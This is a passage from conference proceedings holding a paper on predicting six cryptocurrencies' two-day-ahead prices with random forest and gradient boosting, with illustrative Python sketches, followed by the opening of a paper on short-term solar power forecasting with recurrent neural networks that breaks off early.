© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 205–217, 2023. https://doi.org/10.1007/978-3-031-28073-3_14
1 Introduction
Most developed countries throughout the world adopt cryptocurrencies on a wide scale. Some significant businesses have begun to accept cryptocurrency as a form of payment on a worldwide scale; Microsoft, Starbucks, Tesla, and Amazon are just a few of them. Cryptocurrency, a form of virtual currency that is protected by cryptography and is therefore hard to counterfeit, now plays a part in the world economy. Network-based blockchain technology is used to distribute cryptocurrencies. In its most basic form, the term "crypto" refers to the various encryption algorithms and cryptographic techniques that safeguard the entries, such as elliptic curve encryption and public-private key pairs. Exchanging cryptocurrencies is easy since they are not tied to any country, and exchanges allow users to buy and sell cryptocurrencies using a variety of currencies. Cryptocurrencies are stored in a sophisticated wallet, which is conceptually
comparable to a virtual bank account. The blockchain is where the timestamp information and records of many trades are stored. In a blockchain, each record is represented by a block, and each block links to the previous block. The information on the blockchain is encrypted. Only the wallet ID of the customer is made visible during exchanges; their name is not [14]. Cryptocurrencies can be obtained in a few ways, including through mining or by buying them on exchanges. Many cryptocurrencies are not used for retail transactions. They serve as a means of exchange and are typically used as assets rather than for regular purchases like groceries and utilities. As intriguing as this new class of investments may sound, cryptocurrencies come with a significant amount of risk, so thorough study is required. This paper's main goal is to inform readers about the benefits and drawbacks of investing in cryptocurrencies. New investments are always accompanied by a great deal of uncertainty, so it is important to analyse every aspect of cryptocurrencies to provide users and investors with better information and to provide information that will encourage ethical usage of cryptocurrencies without having to consider the risks and potential failure of the investment. Cryptocurrencies are one of the riskiest but most prominent investments available in the modern technological and economic environment. Therefore, the prediction of cryptocurrency prices will play a greater role in helping investors decide whether or not to invest in a cryptocurrency. In this study, we select six cryptocurrencies and use two ensemble machine learning algorithms, random forest and gradient boosting, to predict their prices for the next two days.
2 Related Work
Early studies on bitcoin argued over whether it was a currency or purely a speculative asset, with most authors favouring the latter conclusion in light of the cryptocurrency's high volatility, extraordinary short-term gains, and bubble-like price behaviour [3, 4, 7, 17]. The idea that cryptocurrencies are just speculative assets with no underlying value prompted research into potential correlations with macroeconomic and financial variables as well as with other pricing factors related to investor behaviour [10]. Even for more conventional markets, these factors have been shown to be of utmost significance. For instance, [16] point out that Chinese companies that receive more attention from regular investors typically have a lower probability of stock price crashes. The market for cryptocurrencies has exploded during the past ten years [19]. For a brief period, the total market value of cryptocurrencies exceeded $3 trillion, and Bitcoin came to be accepted as a kind of legal tender [1]. These occurrences marked a major turning point in the general use of blockchain technology. Investors in cryptocurrencies currently have a wide range of choices, from Bitcoin and Ethereum to Dogecoin and Tether. Returns can be calculated in several different ways, and it can be challenging to predict returns for a volatile asset with wide price swings like a cryptocurrency [2]. Interest in cryptocurrency forecasting and profit-making using ML approaches has increased over the past three years. Table 1 compiles a number of the papers published since [12], which, to the best of our knowledge, is one of the first studies to address this subject; they are presented in chronological order. The goal of this article is to contextualise and emphasise the key contributions of our study rather than
to present a comprehensive list of all papers that have been published in this area of the literature. See, for instance, [6] for a thorough analysis of cryptocurrency trading and numerous further references on ML trading. Others have investigated whether bitcoin values are primarily influenced by public recognition, as [11] refer to it, measured by social media news, Google searches, Wikipedia views, Tweets, or comments on Facebook or in specialist forums. To forecast changes in the daily values and transactions of bitcoin, Ethereum, and ripple, for instance, [9] investigated user comments and replies in online cryptocurrency groups. Their findings were encouraging, especially for bitcoin [15]. Hidden Markov models based on online social media indicators are used by [13] to create profitable trading strategies for a variety of cryptocurrencies. Bitcoin, ripple, and litecoin are found by [5] to be unconnected to several economic and financial variables in both the time and frequency domains. In summary, these papers show that ML models outperform rival models such as autoregressive integrated moving averages and exponential moving averages in terms of accuracy, and that they improve the predictability of the prices and returns of cryptocurrencies. This holds regardless of the period under analysis, data frequency, investment horizon, input set, type (classification or regression), and method. The performance of trading strategies developed using these ML models is also compared with that of the passive buy-and-hold (B&H) strategy in around half of the research surveyed (with and without trading costs). There is no clear winner among the various machine learning models, although it is generally agreed that ML-based strategies outperform passive ones in terms of overall cumulative return, volatility, and Sharpe ratio.
3 Artificial Intelligence and Machine Learning
3.1 Artificial Intelligence
Artificial intelligence (AI) eliminates repetitive activities, freeing up a worker's time for higher-level, more valuable work. AI is a cutting-edge technology that can deal with data that is too complicated for a person to manage. It may be used to automate tedious and repetitive marketing processes, enabling sales representatives to concentrate on relationship development, lead nurturing, and similar tasks. A VP can design a successful strategy using AI data and recommendation systems. Self-awareness is the highest and most advanced level of artificial intelligence. AI also has applications in several other fields; for example, AI could attend to patients without direct human guidance. AI is already being employed in almost every industry, offering any company that adopts it a competitive advantage. In short, artificial intelligence looks set to shape the future of the world. Understanding the difference between artificial intelligence, machine learning, and deep learning can be confusing. With artificial intelligence, machines perform functions such as learning, planning, reasoning and problem-solving. Deep learning is a kind of machine learning that runs inputs through a biologically inspired neural network architecture.
3.2 Machine Learning
A machine learning system builds prediction models based on historical data and predicts the results for fresh data whenever it receives it. The amount of data has an impact on the accuracy of the predicted output: the more data the model has, the better it can predict the outcome. The need for machine learning in industry is constantly growing. Computers increasingly use machine learning, which enables them to draw lessons from their prior experience. Machine learning uses a variety of approaches to build mathematical models and make predictions. Currently, the technique is employed for a wide range of purposes, including image identification, speech recognition, email filtering, Facebook auto-tagging, recommender systems, and many more.
3.2.1 Machine Learning Algorithms
a. Supervised Machine Learning
Data that carries a predetermined label, such as spam/not-spam or a stock price at a specific time, is known as training data. To produce a model, the learner goes through a training phase in which it is asked to make predictions and is corrected when those predictions are wrong. The training phase is repeated until the model achieves the desired level of accuracy on the training data set. Example algorithms include Back Propagation Neural Networks and Logistic Regression.
b. Unsupervised Machine Learning
Unsupervised learning techniques are used when only the input variables exist and there are no corresponding output variables. They employ unlabeled training data to build models of the underlying data structure. For example, data can be grouped using a clustering technique so that the objects in one cluster are more similar to one another than they are to those in another cluster.
c. Reinforcement Machine Learning
Reinforcement learning is a type of machine learning that enables agents to choose the best course of action based on their current state by training them to take actions that maximize rewards. Reinforcement learning systems frequently discover the best behaviors through trial and error. Imagine you are playing a video game where you need to go to certain locations at certain times to earn points. A reinforcement algorithm playing that game would first move the character randomly, but over time and with plenty of trial and error, it would eventually figure out where and when to move the character to maximize its point total.
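The trial-and-error behaviour described for reinforcement learning can be illustrated with a toy example. The sketch below is not part of this study's pipeline: it assumes a hypothetical one-dimensional "game" with five cells, where the agent starts in the leftmost cell and earns one point on reaching the rightmost cell, and it uses tabular Q-learning with made-up hyperparameters.

```python
import random
from typing import List


def train_corridor_agent(
    n_cells: int = 5,
    episodes: int = 300,
    alpha: float = 0.5,      # learning rate
    gamma: float = 0.9,      # discount factor
    epsilon: float = 0.2,    # probability of a random exploratory move
    seed: int = 0,
) -> List[List[float]]:
    """Learn action values q[state][action]; action 0 = left, 1 = right."""
    rng = random.Random(seed)
    q = [[0.0, 0.0] for _ in range(n_cells)]
    goal = n_cells - 1
    for _ in range(episodes):
        state = 0
        for _ in range(200):  # step cap so an episode always ends
            # Move randomly when exploring or when nothing has been learned
            # yet for this state; otherwise take the better-valued action.
            if rng.random() < epsilon or q[state][0] == q[state][1]:
                action = rng.randrange(2)
            else:
                action = 0 if q[state][0] > q[state][1] else 1
            next_state = max(0, state - 1) if action == 0 else state + 1
            reached_goal = next_state == goal
            reward = 1.0 if reached_goal else 0.0
            target = reward if reached_goal else gamma * max(q[next_state])
            q[state][action] += alpha * (target - q[state][action])
            state = next_state
            if reached_goal:
                break
    return q


def greedy_policy(q: List[List[float]]) -> List[str]:
    """Best learned move for every non-goal cell."""
    return ["left" if left > right else "right" for left, right in q[:-1]]


policy = greedy_policy(train_corridor_agent())
```

The agent starts by wandering at random, and after enough episodes the learned values favour moving right in every cell, which mirrors the video-game description above.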
4 Methodology
In this section, we describe our approach to predicting cryptocurrency prices using the proposed machine learning algorithms [18]. The proposed workflow for this study is shown in Fig. 1.
Fig. 1. Proposed flowchart
4.1 Data Collection
Secondary data is used for this study. The data is collected from in.investing.com, which provides various historical price data for free. We collected data for the top 10 cryptocurrencies from this platform. Table 1 shows the names of the selected cryptocurrencies and the dates covered by the data.
Table 1. Cryptocurrencies
S. No.  Cryptocurrency name  Data collected from date  Data collected till date  Number of observations
1       Binance              1/1/21                    10/1/21                   375
2       Cardano              1/1/21                    10/1/21                   375
3       Ethereum             1/1/21                    10/1/21                   375
4       Solana               1/1/21                    10/1/21                   372
5       Tether               1/1/21                    10/1/21                   375
6       USD coin             1/1/21                    10/1/21                   375
The collected dataset contains the following features: Date, Price, Open, High, Low, and Volume. Date: date of the observation; Price: closing price on the given day; Open: opening price on the given day; High: highest price on the given day; Low: lowest price on the given day; Volume: volume of transactions on the given day.
A. I. Iliev and M. Panwar
4.2 Preliminary Data Analysis
We examine the distribution of our data before building the final machine learning model. Since price is our target variable, we plot the price of each cryptocurrency together with its 30-day and 2-day rolling averages, and use the plots to judge whether the data can support predicting prices 30 days or 2 days into the future. The price plots for each cryptocurrency are shown below.
4.2.1 Binance Plot
Fig. 2. Binance normal price vs monthly avg price
Fig. 3. Binance normal price vs 2 days avg price
The Binance price is less erratic than the price of bitcoin (Fig. 2 and Fig. 3) and appears to increase over time, although its current price is far lower than that of bitcoin. For an investor looking for a lower-priced cryptocurrency, Binance can be a good choice. The monthly average price does not fit the normal price well (Fig. 2), which means we cannot predict the Binance price 30 days ahead, whereas the 2-day rolling average (Fig. 3) follows the normal price closely. Therefore, we can predict the Binance price 2 days into the future.
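The comparison between a short and a long rolling average can be sketched as follows. This is a minimal illustration on hypothetical prices, with a 5-day window standing in for the 30-day window because the toy series is short. The gap measure is an assumption introduced here, not a metric reported in the study.

```python
def rolling_mean(values, window):
    """Trailing moving average; None until a full window is available."""
    out = []
    running = 0.0
    for i, v in enumerate(values):
        running += v
        if i >= window:
            running -= values[i - window]   # drop the value leaving the window
        out.append(running / window if i >= window - 1 else None)
    return out

def mean_abs_gap(values, smoothed):
    """Average absolute distance between the raw and the smoothed series."""
    pairs = [(v, s) for v, s in zip(values, smoothed) if s is not None]
    return sum(abs(v - s) for v, s in pairs) / len(pairs)

# Hypothetical daily closing prices (not taken from the study's data).
prices = [100, 104, 99, 107, 111, 105, 115, 120, 113, 125, 131, 124]
short_avg = rolling_mean(prices, 2)
long_avg = rolling_mean(prices, 5)

short_gap = mean_abs_gap(prices, short_avg)
long_gap = mean_abs_gap(prices, long_avg)
```

A smaller gap means the smoothed curve tracks the price more closely, which is the visual judgement made from the figures.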
4.2.2 Cardano Plot
Fig. 4. Cardano normal price vs monthly avg price
Fig. 5. Cardano normal price vs 2 days avg price
The Cardano price peaked on September 21 (Fig. 4 and Fig. 5) and has been decreasing since, so investing in Cardano would be risky. Predicting the Cardano price runs into the same issue we saw with bitcoin and Binance, so here too we predict the price 2 days into the future.
4.2.3 Ethereum Plot
Based on Fig. 6 and Fig. 7, we likewise predict the price of Ethereum two days into the future.
Fig. 6. Ethereum normal price vs monthly avg price
The price of Ethereum shows an increasing trend, but after December 21 it decreases. The price level of Ethereum is fairly high, and investors may consider it. Before making that suggestion, however, we check the predicted price of Ethereum for 12 January to see whether the price is expected to rise or fall relative to its price on 10 January.
Fig. 7. Ethereum normal price vs 2 days avg price
4.2.4 Solana Plot Here we will predict the price after two days for Solana – Fig. 8 and Fig. 9.
Fig. 8. Solana normal price vs monthly avg price
Fig. 9. Solana normal price vs 2 days avg price
4.2.5 Tether Plot
Here we will predict the price after two days for Tether – Fig. 10 and Fig. 11.
4.2.6 USD Plot
Here we will predict the price after two days for USD coin – Fig. 12 and Fig. 13.
Thus, the above plots show that cryptocurrency prices change randomly, i.e., no consistent trend is present in the price of each cryptocurrency. The monthly average price does not fit the normal price well, which means we cannot predict prices 30 days ahead. The 2-day rolling average does fit, so we can predict the price of each cryptocurrency 2 days ahead using machine learning.
Fig. 10. Tether normal price vs monthly avg price
Fig. 11. Tether normal price vs 2 days avg price
Fig. 12. USD coin normal price vs monthly avg price
Fig. 13. USD coin normal price vs 2 days avg price
4.3 Data Preprocessing
The collected data are raw and cannot be fed directly to machine learning models, so they must first be processed. Data preprocessing is the set of methods that transform unstructured data into structured data, and it involves several techniques. First, we check whether the data contain any null values, which must be fixed before applying any algorithm. Then we normalize the data, which helps to increase the accuracy of our machine learning models.
4.4 Model Preparation
In this section we fit our machine learning models. Because we use supervised machine learning algorithms, we first extract the dependent and independent variables. The dependent variable is "Price after two days", obtained by shifting the Price column by 2 rows. The independent variables are Price, Open, High, Low, and the OHLC average:
$$\text{OHLC average} = \frac{\text{Open} + \text{High} + \text{Low} + \text{Price}}{4}$$
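The preprocessing and variable extraction described above can be sketched as follows. This is a minimal illustration on hypothetical rows. The helper names and the choice of min-max scaling are assumptions, since the text does not say which normalization was used.

```python
def drop_incomplete(rows):
    """Remove rows that contain a null (None) value in any field."""
    return [r for r in rows if all(v is not None for v in r.values())]

def min_max_scale(values):
    """Rescale values to [0, 1]; one common normalization (assumed here)."""
    lo, hi = min(values), max(values)
    if hi == lo:
        return [0.0] * len(values)
    return [(v - lo) / (hi - lo) for v in values]

def ohlc_average(row):
    """(Open + High + Low + Price) / 4, as defined in the text."""
    return (row["Open"] + row["High"] + row["Low"] + row["Price"]) / 4

def build_dataset(rows, horizon=2):
    """Pair each day's features with the closing price `horizon` days later."""
    features, targets = [], []
    for today, future in zip(rows, rows[horizon:]):
        features.append([today["Price"], today["Open"], today["High"],
                         today["Low"], ohlc_average(today)])
        targets.append(future["Price"])
    return features, targets

# Hypothetical rows; the second one has a missing value and is dropped.
raw = [
    {"Open": 10.0, "High": 12.0, "Low": 9.0, "Price": 11.0},
    {"Open": 11.0, "High": None, "Low": 10.0, "Price": 11.5},
    {"Open": 11.0, "High": 13.0, "Low": 10.0, "Price": 12.0},
    {"Open": 12.0, "High": 14.0, "Low": 11.0, "Price": 13.0},
    {"Open": 13.0, "High": 16.0, "Low": 12.0, "Price": 15.0},
]
rows = drop_incomplete(raw)
X, y = build_dataset(rows)
scaled_prices = min_max_scale([r["Price"] for r in rows])
```

Shifting by two rows means the last two days have no target, so the dataset is two samples shorter than the cleaned input.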
4.4.1 Algorithms
The algorithms considered in this study are random forest and gradient boosting, both of which are powerful ensemble machine learning techniques.
Random Forest
Random forest is a supervised learning technique typically used for classification and regression. Because it builds many decision trees from samples of the data, it is a form of ensemble learning. For regression, the prediction is the average of the trees' outputs. Although these techniques can predict both continuous (regression) and discrete (classification) outcomes, this algorithm performs better for classification problems than for regression [8]. Understanding the ensemble technique is necessary to understand how random forests operate. In essence, an ensemble combines two or more models, so that predictions are based on a group of models rather than on a single model. Ensembles use two different kinds of techniques:
1. Bagging Ensemble Learning: the dataset is split into several subsets, the same algorithm is applied to each subset, and the final output is decided by majority voting. Random forest employs this strategy for classification.
2. Boosting Ensemble Learning: models are built sequentially, with each new learner correcting the errors of the previous ones, so that weak learners are combined into a strong one with high accuracy. Examples are AdaBoost and XGBoost.
With the ensemble approaches in place, we turn to the random forest method, which uses the first approach, bagging. The random forest method proceeds through the following steps:
Step 1: The dataset is split into several subsets, with each element drawn at random.
Step 2: A single algorithm is used to train on each subset; in the case of a random forest, a decision tree is employed.
Step 3: Each individual decision tree produces an output.
Step 4: The final output is obtained by combining the outputs of all the trees: by majority vote for classification, and by averaging for regression.
Hyperparameter values taken into consideration: n_estimators = 200, random state = 42.
Gradient Boosting
Gradient boosting is a very powerful machine learning algorithm in which many weak learners are combined to form a strong one. Gradient boosting can be tuned by changing its learning rate. For this algorithm, we check model accuracy at several learning rates and select the best model for our problem among them. Hyperparameter values taken into consideration: random state = 0, n_estimators = 100.
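Both ensemble strategies and the learning-rate search can be sketched in plain Python. This is a simplified illustration, not the study's implementation. It uses one-split trees (stumps) on a single hypothetical feature instead of full decision trees, and a smaller number of bagged estimators than the 200 quoted above.

```python
import random

def fit_stump(xs, ys):
    """Fit a one-split regression tree (stump) by minimising squared error."""
    best = None
    for t in sorted(set(xs))[:-1]:            # the largest x cannot split the data
        left = [y for x, y in zip(xs, ys) if x <= t]
        right = [y for x, y in zip(xs, ys) if x > t]
        lm, rm = sum(left) / len(left), sum(right) / len(right)
        sse = sum((y - lm) ** 2 for y in left) + sum((y - rm) ** 2 for y in right)
        if best is None or sse < best[0]:
            best = (sse, t, lm, rm)
    if best is None:                          # all x equal: fall back to the mean
        mean = sum(ys) / len(ys)
        return lambda x: mean
    _, t, lm, rm = best
    return lambda x: lm if x <= t else rm

def bagging_fit(xs, ys, n_estimators=25, random_state=42):
    """Bagging: train each stump on a bootstrap sample, then average the outputs."""
    rng = random.Random(random_state)
    n = len(xs)
    models = []
    for _ in range(n_estimators):
        idx = [rng.randrange(n) for _ in range(n)]   # sample with replacement
        models.append(fit_stump([xs[i] for i in idx], [ys[i] for i in idx]))
    return lambda x: sum(m(x) for m in models) / len(models)

def boosting_fit(xs, ys, n_estimators=100, learning_rate=0.1):
    """Gradient boosting for squared error: each stump fits the current residuals."""
    base = sum(ys) / len(ys)
    preds = [base] * len(xs)
    stumps = []
    for _ in range(n_estimators):
        residuals = [y - p for y, p in zip(ys, preds)]
        stump = fit_stump(xs, residuals)
        stumps.append(stump)
        preds = [p + learning_rate * stump(x) for x, p in zip(xs, preds)]
    return lambda x: base + learning_rate * sum(s(x) for s in stumps)

def mse(model, xs, ys):
    """Mean squared error of a model on (xs, ys)."""
    return sum((model(x) - y) ** 2 for x, y in zip(xs, ys)) / len(xs)

# Hypothetical one-feature data: even x for training, odd x for validation.
train_x = list(range(0, 20, 2))
train_y = [x * x for x in train_x]
val_x = list(range(1, 20, 2))
val_y = [x * x for x in val_x]

bagged = bagging_fit(train_x, train_y)
scores = {lr: mse(boosting_fit(train_x, train_y, learning_rate=lr), val_x, val_y)
          for lr in (0.05, 0.1, 0.5)}
best_lr = min(scores, key=scores.get)   # learning rate with the lowest validation error
```

Selecting the learning rate on held-out data rather than on the training set is a design choice made for this sketch; the text does not state which data the comparison used.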
5 Results
After training, the models achieved good results on the test data for most of the cryptocurrencies. Solana has the highest accuracy, at 98.14%, while USD coin and Tether have the lowest accuracy, as their prices fluctuate erratically (see Table 2).
Table 2. Accuracy score of algorithms on each cryptocurrency
S. No. | Cryptocurrency name | Random forest accuracy | Gradient boosting accuracy | Learning rate
1 | Binance | 96.56% | 96.85% | 0.05
2 | Cardano | 94.88% | 95.11% | 0.05
3 | Ethereum | 96.61% | 96.60% | 0.05
4 | Solana | 98.07% | 98.14% | 0.1
5 | Tether | 38.00% | 12.35% | 0.05
6 | USD coin | 59.00% | 14.80% | 0.05
Since we last observed the price of each cryptocurrency on January 10th, we are predicting its price for January 12th and comparing it to the actual price of each coin (see Table 3).
Table 3. Predicted results
S. No. | Cryptocurrency name | Prediction of price on Jan. 12th using random forest | Prediction of price on Jan. 12th using gradient boosting | Actual price on Jan. 12th
1 | Binance | 435.50 | 429.70 | 487.01
2 | Cardano | 1.20 | 1.20 | 1.31
3 | Ethereum | 3142.00 | 3131.40 | 3370.89
4 | Solana | 141.70 | 141.20 | 151.43
5 | Tether | 1.00 | 1.00 | 1.00
6 | USD coin | 1.00 | 1.00 | 0.99
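To compare the predictions in Table 3 with the actual prices on a common scale, the absolute percentage error of each prediction can be computed. The sketch below uses the Table 3 values as given; the percentage-error measure itself is an addition for illustration and is not a metric reported in the study.

```python
# (random forest prediction, gradient boosting prediction, actual price), from Table 3
table3 = {
    "Binance": (435.50, 429.70, 487.01),
    "Cardano": (1.20, 1.20, 1.31),
    "Ethereum": (3142.00, 3131.40, 3370.89),
    "Solana": (141.70, 141.20, 151.43),
    "Tether": (1.00, 1.00, 1.00),
    "USD coin": (1.00, 1.00, 0.99),
}

def pct_error(predicted, actual):
    """Absolute error as a percentage of the actual price."""
    return abs(predicted - actual) / actual * 100

errors = {
    name: (pct_error(rf, actual), pct_error(gb, actual))
    for name, (rf, gb, actual) in table3.items()
}

for name, (rf_err, gb_err) in errors.items():
    print(f"{name:10s} random forest {rf_err:5.2f}%   gradient boosting {gb_err:5.2f}%")
```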
6 Conclusions and Future Work
In this study, we introduced the idea of cryptocurrencies and how they help investors to gain money while taking the risk of loss into account. We proposed a prediction model employing artificial intelligence (AI) and machine learning, with which we project the prices of six cryptocurrencies two days ahead in order to lower the risk of loss. To find the best algorithm for predicting the performance of these six cryptocurrencies, we applied two ensemble machine learning algorithms. The results show that both algorithms perform well for most cryptocurrencies, except for Tether and USD coin (whose prices changed erratically). The performance metric used in this study was the accuracy score, which showed that both algorithms perform well (accuracy above 95%) for Solana, Binance, and Ethereum. In future work, deep learning models such as ANN and LSTM can be used to achieve better results, and these can be further optimized with techniques such as particle swarm optimization and genetic algorithms, which belong to the family of evolutionary algorithms.
References
1. AF, B.: The inefficiency of bitcoin revisited: a dynamic approach. Econ. Lett. 161, 1–4 (2017)
2. Anon.: Top 10 Cryptocurrencies to Bet on for Good Growth in Feb 2022 (2022). https://www.analyticsinsight.net/top-10-cryptocurrencies-to-bet-on-for-good-growth-in-feb-2022/
3. Cheah, E.T., Fry, J.: Speculative bubbles in bitcoin markets? An empirical investigation into the fundamental value of Bitcoin. Econ. Lett. 130, 32–36 (2015)
4. Cheung, A., Roca, E.: Crypto-currency bubbles: an application of the Phillips-Shi-Yu methodology on Mt. Gox Bitcoin prices. Appl. Econ. 47(23), 2348–2358 (2015)
5. Corbet, S., Meegan, A.: Exploring the dynamic relationships between cryptocurrencies and other financial assets. Econ. Lett. 165, 28–34 (2018)
6. Fang, F., Carmine, V.: Cryptocurrency trading: a comprehensive survey. Preprint arXiv:2003.11352 (2020)
7. Dwyer, G.P.: The economics of Bitcoin and similar private digital currencies. J. Financ. Stab. 17, 81–91 (2015)
8. Borges, D.L., Kaestner, C.A.A. (eds.): SBIA 1996. LNCS, vol. 1159. Springer, Heidelberg (1996). https://doi.org/10.1007/3-540-61859-7
9. Kim, Y.B., Kim, J.H.: Predicting fluctuations in cryptocurrency transactions based on user comments and replies. PLoS One 11(8), e0161197 (2016)
10. Böhme, R., Christin, N., Edelman, B., Moore, T.: Bitcoin: economics, technology, and governance. J. Econ. Perspect. (JEP) 29(2), 213–238 (2015)
11. Li, X., Wang, C.A.: The technology and economic determinants of cryptocurrency exchange rates: the case of Bitcoin. Decis. Support Syst. 95, 49–60 (2017)
12. Madan, I., Saluja, S.: Automated bitcoin trading via machine learning algorithms (2019). http://cs229.stanford.edu/proj2014/Isaac%20Madan,20
13. Phillips, R.C., Gorse, D.: Predicting cryptocurrency price bubbles using social media data and epidemic modelling. In: 2017 IEEE Symposium Series on Computational Intelligence (SSCI), pp. 1–7. https://doi.org/10.1109/SSCI.2017.8280809
14. Kaur, A., Nayyar, A.: Blockchain a Path to the Future Cryptocurrencies and Blockchain Technology Applications. John Wiley & Sons, Ltd (2020)
15. Tiwari, A.K., Jana, R.K.: Informational efficiency of Bitcoin—an extension. Econ. Lett. 163, 106–109 (2018)
16. Wen, F., Xu, L.: Retail investor attention and stock price crash risk: evidence from China. Int. Rev. Financ. Anal. 65, 101376 (2019)
17. Yermack, D.: Is Bitcoin a Real Currency? An Economic Appraisal. Springer, Berlin (2015)
18. Catania, L., Grassi, S., Ravazzolo, F.: Predicting the volatility of cryptocurrency time-series. In: Corazza, M., Durbán, M., Grané, A., Perna, C., Sibillo, M. (eds.) Mathematical and Statistical Methods for Actuarial Sciences and Finance, pp. 203–207. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-89824-7_37
19. Tran, V.L., Leirvik, T.: Efficiency in the markets of crypto-currencies. Finance Res. Lett. 35, 101382 (2020)
Short Term Solar Power Forecasting Using Deep Neural Networks Sana Mohsin Babbar(B) and Lau Chee Yong School of Computer, Engineering and Technology, Asia Pacific University of Technology and Innovation (APU), 57000 Kuala Lumpur, Malaysia [email protected], [email protected]
Abstract. The intermittent and unpredictable nature of solar power has posed a persistent challenge in recent years. Mitigating the sporadic behavior of solar energy resources is imperative for the future of PV system generation. Forecasting plays an important role in the optimization of grid control and the economic dispatch of energy. This paper presents a model that forecasts short-term solar power up to 6 h ahead using a recurrent neural network (RNN). Recurrent neural networks are among the most capable neural network types for sequential data. This study also reviews the use of recurrent neural networks for solar power generation prediction. Simulations and results show that the proposed methodology performs well. Seven months of data were chosen for training, which reduces the RMSE from 47 to 30.1, the MAE from 56 to 39, and, most importantly, the MAPE from 18% to 11% overall. This research also shows that good accuracy and efficacy are attained through the calibration of solar irradiance, which demonstrates the plausibility and effectiveness of the proposed model.
Keywords: PV system generation · Recurrent neural network (RNN) · Short-term solar power forecasting
1 Introduction
Solar energy is one of the most popular and widely used of all renewable sources. The concept of "Green Energy" has taken hold owing to its extensive use, mostly in tropical areas where solar irradiance is at its maximum [1]. It also helps to mitigate carbon emissions. Around the globe, the usage of solar energy has been growing. In this era, almost every large-scale company uses PV solar systems to reduce pollution and carbon emissions, owing to their environmentally friendly nature [2]. However, it is difficult to manage the variation and intermittency of the solar energy produced. For this reason, predictive tools are used to gain controllability and better accuracy [3]. Forecasting or prediction of solar power generation plays a vital role in the smart grid [4]. Forecasting solar power generation brings several benefits, depending on the time horizon. First, forecasts serve the energy imbalance market (EIM). Second, it has been stated that the probability of an energy imbalance could be reduced by 19.65% using forecasting methods [5].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 218–232, 2023. https://doi.org/10.1007/978-3-031-28073-3_15
Furthermore, past research has observed that forecasts can also reduce operational costs, supporting the economic sustainability of a state. In [6], an electric vehicle (EV) charge-discharge management framework was proposed to make better use of PV output in the smart grid by exchanging information between home energy management systems (HEMS) and grid energy management systems (GEMS). The advantages of solar energy are stated in almost every study on renewable energy. PV arrays are environmentally friendly and produce no pollution. Moreover, PV power plants have minimal maintenance expenditure, and their operating cost is also low [7]. Constructive and effective planning for installing a PV solar plant leads to better power utility. In particular, forecasting methods should be planned according to the PV plant and its procedures [8]. Hence, to avoid inconvenience and intermittency in solar energy, effective forecasting models are the state of the art worldwide. Forecasting plays an important role in solving renewable energy related problems and is thus a contribution to the energy sector. From the management perspective, energy management systems (EMS) that use forecast mechanisms ensure clean energy at high efficiency.
2 Literature Review
In the past few years, forecasting and prediction of solar power generation have gained research attention. Prediction methods, particularly for PV prediction, are mainly classified into three classes: physical methods, statistical methods, and artificial intelligence techniques. Physical models predict data through models such as Model Output Statistics (MOS), Numerical Weather Prediction (NWP), and other geological models. They are meant to measure or obtain meteorological data with precision. However, operating these models requires fine calibration and precision. Statistical models, on the other hand, are data-driven approaches. They mostly deal with historical data sets and aim at error minimization [9]. Models based on artificial intelligence (AI) techniques are likewise adequate tools for PV and wind prediction. The best feature of AI techniques is that they can easily deal with non-linear features [10]. In recent and past research, the focus on AI and machine learning approaches for forecasting has been at its peak. Different linear and non-linear models have been implemented on the data sets produced by physical and statistical models. The study in [11] showed that, for massive and complicated computation, neural networks with a hybrid approach can prove to be the best predictive tool. A model was established in 2017 using an artificial neural network (ANN) and analog ensembles (AnEn) for short-term PV power forecasting. The results showed that a combination of both techniques could yield the best results. In 2015, a study was conducted in China, which has large renewable energy reserves, to forecast PV power output one day ahead with four different variables using support vector machines (SVM). Simulations showed that the proposed SVM model is effective and promising for PV power output [12]. An improved and accurate PV power forecasting model was proposed using a deep LSTM-RNN (Long Short-Term Memory Recurrent Neural Network). In that study, hourly data sets covering one year were used. LSTM was used for its extensive recurrent architecture and memory unit. Compared to other techniques and models, LSTM-RNN was observed to minimize the errors best [13]. An extensive and detailed review was conducted in 2020, in which the researchers surveyed past work on solar power forecasting using artificial neural networks. It observed that forecasting plays a crucial role in the economic dispatch and optimization of solar energy in the smart grid, and that forecasting and prediction algorithms must therefore be implemented. The review concluded that neural networks are the hallmark of PV power forecasting [14]. A comparative analysis was made to observe the efficacy of RNN. In 2018, research was conducted over multiple time horizons within the domain of short-term solar forecasting using RNN. Only 4 h ahead forecasting was done, and the RMSE obtained was between 20% and 40% [15]. This paper, by contrast, covers six-hour-ahead prediction and achieves an RMSE of 30% and good accuracy under the MAPE criterion. This research aims to predict solar power generation using an RNN with the Levenberg-Marquardt training model [16]. The key objective of this paper is to compare the PV power output with the persistence model to assess the predictive model's performance. In short-term power forecasting, the persistence model is chosen as the comparative model for checking precision [17]. The literature review shows that an RNN, with any training model chosen, achieves good accuracy and precision. An RNN has the distinctive feature of memorizing information about the data set. It has repeatedly proved useful for prediction because it also remembers previous inputs [18].
3 Deep Neural Network
Deep Neural Network (DNN) machine learning approaches have been adopted widely over the past few years. They can extract information from several kinds of data sets, such as audio, video, images, matrices, and arrays. Numerous studies have been conducted in the area of deep learning, and recurrent neural networks are one of its branches [19]. RNNs are mostly used in Natural Language Processing (NLP), as they specialize in processing sequences and large data sets. An attractive feature of RNNs is that both inputs and outputs can be of variable length. An RNN extends the feedforward neural network with recurrent connections and commonly involves multiple layers and parameters. It was mainly chosen here for its ability to handle multiple parameters. The RNN architecture is rich, and the network is trained with back-propagation. The literature review in [20] discusses different types of recurrent neural networks, i.e., the infinite impulse neural network, Elman recurrent neural network, diagonal recurrent neural network, and local activation feedback multilayer network. Figure 1 shows the basic layout and architecture of a recurrent neural network.
Fig. 1. Basic architecture of RNN.
The basic formulation of the RNN is given in Eqs. 1 and 2 below. Equation 1 states that the hidden state h(t) is a function f of the previous hidden state h(t−1), the current input x(t), and the chosen parameters θ. The network typically learns to use h(t) as a summary of the past input sequence up to time t. The output y(t) is then obtained as the product of the weights w_hy with the hidden state, plus the bias b_y.
$$h(t) = f(h(t-1), x(t); \theta) \qquad (1)$$
$$y(t) = w_{hy}\, h(t) + b_y \qquad (2)$$
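A scalar version of Eqs. 1 and 2 can be sketched as follows. The text leaves f unspecified; the tanh activation and the split of θ into w_hh, w_xh, and b_h are assumptions made here (the usual Elman form), and all weight values are hypothetical.

```python
import math

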